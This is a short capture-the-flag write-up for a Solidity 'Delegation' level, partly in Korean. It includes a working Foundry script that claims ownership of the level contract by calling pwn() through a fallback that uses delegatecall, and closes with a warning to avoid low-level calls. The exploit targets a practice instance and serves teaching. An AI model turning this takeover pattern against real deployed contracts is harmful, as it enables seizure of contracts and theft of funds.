The goal of this level is for you to claim ownership of the instance you are given.
Things that might help
Look into Solidity's documentation on the delegatecall low level function, how it works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
Fallback methods
Method ids
https://solidity-kr.readthedocs.io/ko/latest/types.html?highlight=delegatecall#address-members
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "forge-std/console.sol";
import "forge-std/Script.sol";
import "../src/delegate_call.sol";
contract POC is Script {
Delegation public target;
function setUp() external {
address payable delegateAddress = payable(vm.envAddress("level_contract_address"));
target = Delegation(delegateAddress);
}
function run() external {
vm.startBroadcast(vm.envUint("user_private_key"));
(bool success, ) = address(target).call(abi.encodeWithSignature("pwn()"));
console.log("SUCCESS? : ",success);
console.log("Attack completed");
vm.stopBroadcast();
}
}
알아야 할 점 : call, delegatecall, callcode는 매우 Low-level 함수이므로 최후의 수단으로서만 쓰기!!
(한줄요약 : 쓰지마)
